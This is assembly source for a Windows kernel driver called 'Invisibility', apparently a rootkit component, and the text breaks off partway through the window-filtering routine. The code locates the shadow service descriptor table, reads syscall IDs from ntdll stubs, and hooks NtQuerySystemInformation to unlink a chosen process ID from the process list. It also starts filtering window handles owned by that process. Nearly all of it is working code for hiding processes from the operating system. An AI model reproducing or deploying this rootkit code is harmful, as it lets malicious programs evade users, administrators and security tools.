;@ECHO OFF
;GOTO MAKE
Comment %
-----------------------------------------------------------------------------------------
Invisibility - Kernel Mode Driver
---------------------------------
Purpose:
- hook ntoskrnl!NtQuerySystemInformation and modify the API output to hide a
specified process
- hook win32k!NtUserBuildHwndList and modify the API output to hide the
window handles, owned by the target process, to the caller
by yoda
-----------------------------------------------------------------------------------------
%
.386
.MODEL FLAT, STDCALL
OPTION CASEMAP:NONE
INCLUDE \masm32\include\windows.inc
INCLUDE string.INC
INCLUDE ntstruc.INC
INCLUDE ntddk.INC
INCLUDE ntoskrnl.INC
INCLUDE NtDll.INC
INCLUDE IoCtrl.INC
INCLUDELIB \masm32\lib\wdm.lib
INCLUDELIB \masm32\lib\ntoskrnl.lib
INCLUDELIB \masm32\lib\ntdll.lib
;
; structure one can find at ntoskrnl!KeServiceDescriptorTable and at 'KeServiceDescriptorTableShadow'
;
; One 16-byte service descriptor entry. GetKeServiceDescriptorTableShadow
; scans for a byte-identical copy of the exported one and then plausibility-
; checks the entry that follows it with the constraints noted per field.
SSDT STRUCT
pSSAT LPVOID ? ; System Service Address Table ( LPVOID[] ); presumably one handler pointer per service ID - must be a kernel address (sign bit set) to pass the scan
Obsolete DWORD ? ; or maybe: API ID base - real meaning not established here; the scan requires it to be 0
dwAPICount DWORD ? ; number of entries; the scan requires the high word to be 0
pSSPT LPVOID ? ; System Service Parameter Table ( BYTE[] ); must be a kernel address (sign bit set) to pass the scan
SSDT ENDS
;
; structure being built by the PUSHAD instruction on the stack
;
; Layout of the 32 bytes PUSHAD leaves on the stack, lowest address first
; (PUSHAD pushes EAX first, so EAX ends up at the highest offset, +28).
; Alignment 1 keeps SIZEOF == 32; NtQuerySystemInformationHook relies on that
; to locate its argument list and to patch the saved EAX before POPAD.
PUSHA_STRUCT STRUCT 1
_EDI DWORD ? ; +0
_ESI DWORD ? ; +4
_EBP DWORD ? ; +8
_ESP DWORD ? ; +12 value of ESP before the PUSHAD (ignored by POPAD)
_EBX DWORD ? ; +16
_EDX DWORD ? ; +20
_ECX DWORD ? ; +24
_EAX DWORD ? ; +28 overwritten by the hook to set its return value
PUSHA_STRUCT ENDS
;------------CONST-----------------------------------------------------------------------
.CONST
; Device and symbolic-link names. TEXTW is a string.INC macro not visible
; here; the trailing "/0" is presumably its NUL-terminator marker - confirm.
; Consumed by DriverEntry, which is outside this view.
TEXTW szDevPath, <\Device\INVISIBILITY/0>
TEXTW szSymPath, <\DosDevices\INVISIBILITY/0>
;------------DATA------------------------------------------------------------------------
.DATA
; Driver globals. A -1 initializer is a "not yet set" sentinel; the values are
; written by code outside this view (DriverEntry / the IOCTL handler behind
; the INVISIBILITY device, presumably).
pDevObj PDEVICE_OBJECT 0 ; our device object
pNQSI DD -1 ; ptr 2 ntdll!NtQuerySystemInformation (user-mode stub address; see NativeApiIdFromApiAddress)
;pEW DD -1 ; ptr 2 user32!EnumWindows
dwTargetPID DD -1 ; PID to hide; compared against ProcessId in HandleSystemProcessInfoOutput
dwNQSI_NT_ID DD -1 ; service index of NtQuerySystemInformation in the SSDT
pOldNtOsNQSI DD 0 ; original ntoskrnl!NtQuerySystemInformation handler; NtQuerySystemInformationHook tail-jumps to it
dwNUBHL_NT_ID DD -1 ; ID of win32k!NtUserBuildHwndList
pOldWin32kNUBHL DD 0 ; original win32k!NtUserBuildHwndList handler
pKSDTS DD 0 ; filled in DriverEntry (presumably the result of GetKeServiceDescriptorTableShadow)
pGetWindowThreadProcessId DD -1 ; user32!GetWindowThreadProcessId; called directly from kernel mode in HandleNtUserBuildHwndListHookOutput
;------------CODE------------------------------------------------------------------------
.CODE
ASSUME FS : NOTHING
;
; Returns: -1 = error
; else = Native API ID
;
; Args: pApiEntry = EntryPoint address of a NTDLL routine
;
; Should look like....
; pApiEntry:
; B8 XX XX XX XX MOV EAX, XXXXXXXX
; 8D 54 24 04 LEA EDX, [ESP + 004h]
; CD 2E INT 02Eh
; C2 YY YY RET YYYY
;
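NativeApiIdFromApiAddress PROC USES ESI EDI EBX, pApiEntry : LPVOID
; Returns in EAX the native API index from an NTDLL stub of the shape
; MOV EAX, imm32 / LEA EDX, [ESP+4] / INT 2Eh / RET imm16, or -1 if the
; 12 bytes at pApiEntry do not match that signature or are not mapped.
;
; pApiEntry arrives from outside the driver (pNQSI holds a user-mode ntdll
; address), so the read is guarded with MmIsAddressValid on both the first
; and the last byte of the stub - the 12 bytes may straddle a page boundary.
; NOTE(review): MmIsAddressValid only answers for the current address space
; and is not a substitute for ProbeForRead/SEH on a user pointer; confirm
; the caller's process context and IRQL.
MOV ESI, pApiEntry
PUSH ESI
CALL MmIsAddressValid ; BOOLEAN result: only AL is defined
TEST AL, AL
JZ @@fail
LEA EAX, [ESI + 11] ; last byte of the 12-byte stub
PUSH EAX
CALL MmIsAddressValid
TEST AL, AL
JZ @@fail
; signature check, comparing in place instead of walking with LODS
CMP BYTE PTR [ESI], 0B8h ; MOV EAX, imm32
JNZ @@fail
CMP DWORD PTR [ESI + 5], 00424548Dh ; 8D 54 24 04 = LEA EDX, [ESP+4] (little-endian)
JNZ @@fail
CMP WORD PTR [ESI + 9], 02ECDh ; CD 2E = INT 2Eh
JNZ @@fail
CMP BYTE PTR [ESI + 11], 0C2h ; RET imm16
JNZ @@fail
; grab NT API index: the imm32 of the leading MOV EAX
MOV EAX, [ESI + 1]
RET
@@fail:
MOV EAX, -1
RET
NativeApiIdFromApiAddress ENDP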
;
; Purpose: Searches in memory for the so called KeServiceDescriptorTableShadow
;
; Return type: void*; NULL == error
;
GetKeServiceDescriptorTableShadow PROC USES ESI EDI EBX
; Heuristic scan: walks the 4 KiB (100h * 16 bytes) following the exported
; KeServiceDescriptorTable looking for a second, byte-identical 16-byte
; descriptor (the shadow table's copy of the ntoskrnl entry). When one is
; found, the 16-byte entry *after* it is plausibility-checked and, if it
; passes, its address is returned in EAX - i.e. the result points at the
; second slot of the shadow table, not at the shadow table's base.
; Returns 0 if nothing plausible is found inside the window.
; Plausibility of a candidate: pSSAT and pSSPT must have the sign bit set
; (kernel addresses, assuming the 2 GB split), Obsolete must be 0 and
; dwAPICount must fit in 16 bits.
; NOTE(review): MmIsAddressValid is only asked about the first byte of each
; 16-byte candidate, never about the candidate's tail or about the entry at
; [EDI + 16] that is then dereferenced; this assumes the window never runs
; into an unmapped page mid-entry - confirm.
; search for a ServiceDescriptorTable being equivalent to the one at KeService...
MOV ESI, _KeServiceDescriptorTable
MOV ESI, [ESI] ; ESI -> non-shadow SDT
LEA EDI, [ESI + 16]
MOV EBX, 0100h ; 0x100 * 16 bytes will be scanned
XOR EAX, EAX ; (not the return value: EAX is reloaded on both exit paths)
@@scan_loop:
PUSH EDI
CALL MmIsAddressValid
TEST EAX, EAX ; NOTE(review): BOOLEAN result, strictly only AL is defined
JZ @F ; not mapped -> skip this candidate
PUSH ESI
PUSH EDI
MOV ECX, 16
REPZ CMPSB ; ZF set only if all 16 bytes match
POP EDI
POP ESI
JNZ @F ; mismatch -> try the next 16-byte slot
; 16-byte copy found -> do additional plausibility tests on the entry after it
LEA EAX, [EDI + 16] ; EAX -> SDT 2 test
MOV ECX, [EAX].SSDT.pSSAT
TEST ECX, ECX
JNS @F ; must look like a kernel address (sign bit set)
MOV ECX, [EAX].SSDT.Obsolete
TEST ECX, ECX
JNZ @F ; must be 0
MOV ECX, [EAX].SSDT.dwAPICount
SHR ECX, 16 ; ECX == high word of struct.counter
JNZ @F ; count must be < 10000h
MOV ECX, [EAX].SSDT.pSSPT
TEST ECX, ECX
JNS @F ; must look like a kernel address (sign bit set)
JMP @@exit ; all checks passed: EAX is the result
@@:
; prepare 4 next location
ADD EDI, 16
DEC EBX ; decrease check counter
JNZ @@scan_loop
@@scan_end:
XOR EAX, EAX ; indicate: error
@@exit:
RET
GetKeServiceDescriptorTableShadow ENDP
;
; Purpose: Wipe structure of our process from the information record chain returned by
; NtQuerySystemInformation
;
; Return type: void
;
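HandleSystemProcessInfoOutput PROC USES ESI EDI EBX, pData : LPVOID
; Unlinks the block whose ProcessId equals dwTargetPID from the chain of
; NT4_SYSTEM_PROCESS_INFORMATION blocks at pData. The first DWORD of each
; block is the offset to the next block; 0 marks the last block.
; Returns nothing. The buffer is only modified when the target is found.
;
; Fixes relative to the original:
; - the last block is now examined (the old loop treated offset 0 as
;   "end of list" before comparing its PID, so a target at the tail was
;   never hidden);
; - a target at the tail is hidden by terminating the chain at its
;   predecessor (adding its offset of 0 to the predecessor did nothing);
; - a target in the first block is left alone instead of writing through a
;   NULL predecessor pointer (hiding it would need a memmove of the rest).
; Registers are preserved via USES so the PROC is STDCALL-clean on its own,
; not only when called under PUSHA/POPA.
; NOTE(review): pData is the caller's (possibly user-mode) buffer and is
; touched here without ProbeForWrite/SEH - confirm the hook's caller context.
MOV ESI, pData ; ESI -> current block
XOR EBX, EBX ; EBX -> previous block, 0 while on the first
@@next:
MOV EAX, [ESI].NT4_SYSTEM_PROCESS_INFORMATION.ProcessId
CMP EAX, dwTargetPID
JZ @@found
MOV ECX, [ESI] ; NextEntryOffset; 0 == this was the last block
TEST ECX, ECX
JZ @@exit ; whole chain walked, target not present
MOV EBX, ESI
ADD ESI, ECX ; ESI -> next block
JMP @@next
@@found:
TEST EBX, EBX
JZ @@exit ; target is the first block: cannot unlink by widening a predecessor
MOV ECX, [ESI] ; offset from target to the block after it
TEST ECX, ECX
JZ @@tail
ADD [EBX], ECX ; predecessor now spans over the target
JMP @@exit
@@tail:
MOV DWORD PTR [EBX], 0 ; target was the last block: end the chain at its predecessor
@@exit:
RET
HandleSystemProcessInfoOutput ENDP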
;
;NTSTATUS NTAPI
;NtQuerySystemInformation (SYSTEMINFOCLASS sic,
; PVOID pData,
; DWORD dSize,
; PDWORD pdSize);
;
NtQuerySystemInformationHook:
; Replacement service entry for ntoskrnl!NtQuerySystemInformation (installed
; by code outside this view using dwNQSI_NT_ID / pOldNtOsNQSI). It forwards
; the four STDCALL arguments to the original handler and, when that call
; returned STATUS_SUCCESS for class 5 (SystemProcessInformation), unlinks
; dwTargetPID's block from the returned buffer. Returns the original NTSTATUS
; in EAX; every other register and the flags are restored by POPA/POPFD.
; Not a PROC: the frame is built by hand, so on entry the stack must be
; exactly [ret][sic][pData][dSize][pdSize] as the C prototype above implies.
; NOTE(review): pData is the caller's buffer and is walked by
; HandleSystemProcessInfoOutput with no ProbeForWrite/SEH; a user-mode
; caller that unmaps it concurrently would fault in kernel mode - confirm
; the buffer is probed elsewhere or wrap the walk.
; INT 3
PUSHFD
PUSHA
; get ptr to argument list: 32 bytes of PUSHA + 4 of PUSHFD + 4 return address
LEA EDI, [ESP + SIZEOF PUSHA_STRUCT + 4 + 4] ; EDI -> argument list
; re-push the caller's arguments and tail-jump into the original handler;
; its own RET pops them and lands on the @@ label below (EDI survives the
; call: it is callee-saved under STDCALL)
PUSH [EDI + 00Ch] ; pdSize
PUSH [EDI + 008h] ; dSize
PUSH [EDI + 004h] ; pData
PUSH [EDI + 000h] ; sic
PUSH @F ; push RETurn address
JMP [pOldNtOsNQSI]
@@:
MOV EDX, EAX ; EDX == NTSTATUS of the original call, kept until the RET
; handle the call output
SUB EAX, EAX
CMP EDX, EAX ; STATUS_SUCCESS ? (buffer-too-small etc. are passed through untouched)
JNZ @@NQSIH_test_done
CMP DWORD PTR [EDI], 5 ; our target query class ? (5 == SystemProcessInformation)
JNZ @@NQSIH_test_done
PUSH [EDI + 004h] ; pData
CALL HandleSystemProcessInfoOutput
@@NQSIH_test_done:
MOV [ESP].PUSHA_STRUCT._EAX, EDX ; overwrite the saved EAX slot so POPA yields the NTSTATUS
POPA
POPFD
RET 4 * 4 ; STDCALL: pop the four DWORD arguments
;
; Purpose: Wipe the HWNDs from the HWND array being returned by NtUserBuildHwndList
;
; Return type: void
;
HandleNtUserBuildHwndListHookOutput PROC pData
LOCAL dwPID : DWORD
; INT 3
;
; trace HWND chain
;
MOV ESI, pData ; ESI -> HWND chain
@@loop:
MOV EBX, [ESI] ; EBX == current HWND from chain
; We can call user32!GetWindowThreadProcessId from KernelMode ! It
; doesn't call any other APIs. It receives all information from the
; raw internal NT structures. -> *happiness*
LEA EAX, dwPID
PUSH EAX
PUSH EBX
CALL pGetWindowThreadProcessId
TEST EAX, EAX
JZ @@loop_end